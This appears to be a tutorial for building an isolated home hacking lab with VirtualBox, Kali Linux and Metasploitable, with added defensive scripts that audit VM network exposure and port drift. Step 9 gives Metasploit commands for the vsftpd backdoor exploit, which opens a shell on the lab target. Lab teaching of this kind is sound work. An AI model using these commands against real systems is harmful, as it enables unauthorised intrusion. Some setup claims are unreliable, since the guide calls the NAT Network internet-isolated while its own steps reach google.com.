A home hacking lab is your private playground for learning security tools without risking anyone’s systems. You’ll have vulnerable machines to attack, networks to compromise, and tools to practice on — all safely isolated on your computer. This guide walks you through building a complete lab using VirtualBox (free) and open-source operating systems.
Why Build a Home Lab?
- Learn without consequences: No risk to production systems
- Practice at your own pace: No time pressure or external deadlines
- Test exploits safely: Understand how attacks work before certification exams
- Experiment with tools: Deploy Metasploit, Nmap, Burp Suite on real targets
- Build reusable scenarios: Save and restore lab snapshots for repeated practice
Hardware Requirements
Minimum specs for a functional lab:
- CPU: Dual-core processor (modern quad-core recommended)
- RAM: 8GB minimum (16GB strongly recommended for multiple VMs)
- Storage: 100GB free disk space (SSD is much faster)
- Network: Stable internet connection for downloading ISOs
Step 1: Install VirtualBox
VirtualBox is a free hypervisor that lets you run multiple operating systems on one computer.
Download:
Visit https://www.virtualbox.org/wiki/Downloads and download for your operating system (Windows, macOS, Linux).
Installation:
Windows:
1. Run the installer (VirtualBox-x.x.x-Win.exe)
2. Follow the wizard (use default settings)
3. Accept driver installation prompts
4. Restart when prompted
macOS:
1. Mount the DMG file
2. Run VirtualBox.pkg
3. Follow the installer
4. Grant Homebrew permissions if using Homebrew
Linux (Debian/Ubuntu):
sudo apt update
sudo apt install virtualbox
# Add user to vboxusers group
sudo usermod -aG vboxusers $USER
# Log out and back in
Verify installation:
VBoxManage --version
Step 2: Configure the Lab Network
Before creating VMs, understand the network setup:
Lab Network Architecture:
Host Machine (Your Computer)
├── NAT Network: 10.0.2.0/24 (isolated)
│ ├── Kali Linux (attacker): 10.0.2.4
│ └── Metasploitable (target): 10.0.2.5
└── Host-only Adapter (backup connection)
Create a NAT Network in VirtualBox:
- Open VirtualBox
- File → Preferences → Network
- Click NatNetworks tab
- Click Create (green plus icon)
- Default name: NatNetwork
- Default network: 10.0.2.0/24
- Check “Support DHCP”
- Click OK
This network is isolated from your host machine and the internet — perfect for safe testing.
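Whether a VM is actually confined to the lab depends on every adapter attached to it, including one added later (for example the second adapter from the Troubleshooting section). The following check is an added example, not part of the original guide: it parses `VBoxManage showvminfo <vm> --machinereadable` output and flags bridged adapters and NAT port-forwards. The function name, verdict labels and sample inputs are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example: classify a lab VM's virtual NICs by how exposed they are.
# Real use on the host, once the VMs exist (requires VirtualBox):
#   VBoxManage showvminfo "Metasploitable-Target" --machinereadable | audit_nics

# Reads machine-readable VM info on stdin and prints "<item> <mode> <verdict>".
# Verdict labels are this example's own:
#   ISOLATED = intnet/hostonly, traffic stays on the host
#   NATTED   = nat/natnetwork, no unsolicited inbound but outbound is allowed
#   EXPOSED  = bridged adapter (on the physical LAN) or NAT port-forward
#              (reachable through the host)
# Returns 1 if anything is EXPOSED, 0 otherwise.
audit_nics() {
  awk -F= '
    { gsub(/"/, "", $2) }
    $1 ~ /^nic[0-9]+$/ && $2 != "none" {
      verdict = "REVIEW"                          # unknown attachment type
      if ($2 == "intnet" || $2 == "hostonly")     verdict = "ISOLATED"
      else if ($2 == "nat" || $2 == "natnetwork") verdict = "NATTED"
      else if ($2 == "bridged") { verdict = "EXPOSED"; bad = 1 }
      print $1, $2, verdict
    }
    $1 ~ /^Forwarding\([0-9]+\)$/ { print "forward", $2, "EXPOSED"; bad = 1 }
    END { exit bad + 0 }
  '
}

# Constructed sample: the target attached as described in this guide.
SAMPLE_LAB='name="Metasploitable-Target"
nic1="natnetwork"
nat-network1="NatNetwork"
nic2="none"'

# Constructed sample: the same VM after a bridged adapter was added by mistake.
SAMPLE_BRIDGED='name="Metasploitable-Target"
nic1="natnetwork"
nat-network1="NatNetwork"
nic2="bridged"
bridgeadapter2="eth0"'

if [ "${1:-}" = "--demo" ]; then
  printf '%s\n' "$SAMPLE_LAB" | audit_nics && echo "lab config: nothing exposed"
  printf '%s\n' "$SAMPLE_BRIDGED" | audit_nics || echo "bridged config: EXPOSED adapter found"
fi
```

Run it against every lab VM after any change in Settings → Network; a non-zero exit status means the vulnerable target is reachable from outside the lab network.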
Step 3: Download Operating System ISOs
Kali Linux (Attacker Machine):
Download from https://www.kali.org/get-kali/
Choose Installer or Live USB version. For a VM, download the ISO (not USB image).
Typical filename: kali-linux-2024.x-installer-amd64.iso (~3.2 GB)
Metasploitable 2 (Vulnerable Target):
Download from https://sourceforge.net/projects/metasploitable/files/
Filename: metasploitable-linux-2.0.0.iso (~737 MB)
Alternative: DVWA (PHP/MySQL vulnerable app) or WebGoat (Java-based).
Store both ISO files in a dedicated folder: /home/user/VirtualBox-ISOs/
Step 4: Create Kali Linux Virtual Machine
Open VirtualBox and click “New”:
| Setting | Value |
|---|---|
| Name | Kali-Linux-Main |
| Machine Folder | Default |
| ISO Image | (Select Kali ISO) |
| OS Type | Linux |
| Version | Debian (64-bit) |
| Memory | 3072 MB (3GB minimum, 4GB better) |
| Disk | 30 GB (dynamic allocation) |
Continue through the wizard:
- Accept defaults for processor allocation (2-4 cores)
- Create virtual hard disk (30 GB, VDI format)
- Click Finish
Configure Network:
- Right-click the Kali VM → Settings
- Go to Network tab
- Adapter 1:
  - Attached to: NAT Network
  - Name: NatNetwork
- Click OK
Start the VM:
- Double-click Kali-Linux-Main
- Complete Kali installation (English, defaults, set root password)
- Installation takes 10-15 minutes
After installation, boot into Kali and verify network:
ip addr show
# Should show eth0 with IP like 10.0.2.4
Step 5: Create Metasploitable Virtual Machine
Create a new VM:
| Setting | Value |
|---|---|
| Name | Metasploitable-Target |
| ISO Image | (Select Metasploitable ISO) |
| Memory | 512 MB minimum |
| Disk | 8 GB |
Configure Network:
- Settings → Network
- Adapter 1: NAT Network, same as Kali
- Click OK
Start the VM:
- Boot from ISO
- Metasploitable will boot to a login prompt
- Default credentials: msfadmin / msfadmin
Verify network:
ifconfig
# Should show eth0 with IP like 10.0.2.5
Test connectivity from Kali:
ping 10.0.2.5
# Should get responses
Step 6: Verify Lab Connectivity
On Kali, test the network:
# Test DNS
nslookup google.com
# Test connectivity to Metasploitable
nmap -sn 10.0.2.0/24
# Scan Metasploitable ports
nmap -p- 10.0.2.5
Expected Metasploitable open ports: 21 (FTP), 22 (SSH), 23 (Telnet), 25 (SMTP), 53 (DNS), 80 (HTTP), 111 (RPC), 139 (Samba), 445 (SMB), 512-514 (rsh), 1099 (Java RMI), 1524 (ingreslock), 2049 (NFS), 3306 (MySQL), 5432 (PostgreSQL), 5900 (VNC), 6667 (IRC), 8009 (Apache Jserv), 8180 (Tomcat), 27374 (BackOrifice), 31337 (BackOrifice), others.
If you see ports, your lab is working.
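To tie this scan to the snapshot workflow later in the guide, record the open ports of the clean target once and compare later scans against that baseline. This is an added example, not part of the original guide; the function names and sample scan lines are constructed, and the input is nmap's grepable (`-oG`) output.

```bash
#!/usr/bin/env bash
# Added example: detect drift in a lab target's open TCP ports.
# Real use on Kali:
#   nmap -p- -oG clean.gnmap 10.0.2.5      # while the target is in its clean state
#   nmap -p- -oG now.gnmap 10.0.2.5        # before the next practice session
#   port_drift "$(cat clean.gnmap)" "$(cat now.gnmap)"

# Reads nmap grepable (-oG) output on stdin, prints open TCP ports one per line.
open_ports() {
  awk -F'\t' '
    { for (i = 1; i <= NF; i++) if ($i ~ /^Ports: /) {
        sub(/^Ports: /, "", $i)
        n = split($i, entry, ", ")
        for (j = 1; j <= n; j++) {
          split(entry[j], f, "/")            # port/state/proto/owner/service/...
          if (f[2] == "open" && f[3] == "tcp") print f[1]
        }
    } }' | sort -un
}

# $1 = baseline -oG text, $2 = current -oG text.
# Prints "NEW <port>" / "GONE <port>" lines; returns 1 when any drift is found.
port_drift() {
  base=$(printf '%s\n' "$1" | open_ports)
  now=$(printf '%s\n' "$2" | open_ports)
  drift=0
  for p in $now;  do printf '%s\n' "$base" | grep -qx "$p" || { echo "NEW $p";  drift=1; }; done
  for p in $base; do printf '%s\n' "$now"  | grep -qx "$p" || { echo "GONE $p"; drift=1; }; done
  return "$drift"
}

# Constructed samples in -oG format (fields are tab-separated).
CLEAN=$(printf 'Host: 10.0.2.5 ()\tPorts: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 23/open/tcp//telnet///\tIgnored State: closed (65532)')
LATER=$(printf 'Host: 10.0.2.5 ()\tPorts: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 9999/open/tcp//unknown///\tIgnored State: closed (65532)')

if [ "${1:-}" = "--demo" ]; then
  port_drift "$CLEAN" "$LATER" || echo "target differs from its clean state: restore the snapshot"
fi
```

A `NEW` or `GONE` line before a session means the target is not in the state you think it is, which is the cue to restore the snapshot before drawing conclusions from a test.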
Step 7: Update and Verify Tools
Kali comes with most tools pre-installed, but update everything:
sudo apt update
sudo apt upgrade -y
Verify key tools are installed:
# Metasploit Framework
msfconsole --version
# Nmap
nmap --version
# Burp Suite (Community Edition)
burpsuite &
# Wireshark
wireshark &
If any are missing:
# Install Metasploit
sudo apt install metasploit-framework
# Install Burp Suite
sudo apt install burpsuite
Step 8: Create Snapshots (Critical!)
Snapshots let you save machine states and revert to them after an attack. This is invaluable for repeated practice.
Create a Metasploitable snapshot before attacking:
- Right-click Metasploitable-Target → Snapshots
- Click Take Snapshot
- Name: Clean State
- Description: Fresh Metasploitable, all services running
- Click OK
After you compromise it, revert:
- Snapshots → Restore Snapshot
- Choose Clean State
- Click Restore
Machine is back to its original state in seconds.
Step 9: First Real Attack
Now test the lab with a real exploit:
On Kali:
# Start Metasploit
msfconsole
# Search for a Metasploitable exploit
search vsftpd
# Use the VSFTPD exploit
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.0.2.5
set LHOST 10.0.2.4
run
If successful, you’ll get a shell on Metasploitable. This confirms:
- Network connectivity works
- Metasploit is functional
- Vulnerable service is running
- Your lab is ready for serious learning
Expanding Your Lab
Add more machines:
- DVWA (Docker-based web vulnerabilities)
- WebGoat (OWASP’s purposefully insecure application)
- FuxSec (Linux with multiple vulnerable services)
- HackTheBox machines (VirtualBox versions)
Networking expansion:
Create multiple NAT networks to simulate:
- DMZ (screened subnet)
- Internal network
- Database tier
Internet
↓
Firewall
↓
DMZ (Web servers) ← 10.0.2.0/24
↓
Internal (Workstations, Domain controllers) ← 10.0.3.0/24
↓
Database (PostgreSQL, MySQL) ← 10.0.4.0/24
Best Practices
- Keep backups: Export VM configs regularly
- Document everything: Log what you’ve learned and tested
- Use snapshots aggressively: Before major changes
- Monitor resources: Use VirtualBox performance monitoring
- Stay organized: Clear naming conventions (purpose-os-date)
- Practice regularly: 15-30 minutes daily beats weekend cramming
- Scale gradually: Add complexity as your skills grow
Troubleshooting
VMs can’t communicate:
- Check both are on same NAT Network
- Run ip addr show (Kali) and ifconfig (Metasploitable)
- Both should be in 10.0.2.0/24 range
Kali has no internet:
- Add second network adapter: Settings → Network → Adapter 2
- Set to “NAT” (not NAT Network)
Metasploitable SSH hanging:
- Normal for older Kali versions, use other services
- Or upgrade Metasploitable to Metasploitable 3
Conclusion
You now have a complete, isolated hacking lab. This is your secure space to learn every tool in the security toolkit. Take full advantage — compromise machines, analyze traffic, craft payloads, break things. Everything here is yours to learn from.
Your home lab is your cybersecurity gymnasium. Use it relentlessly.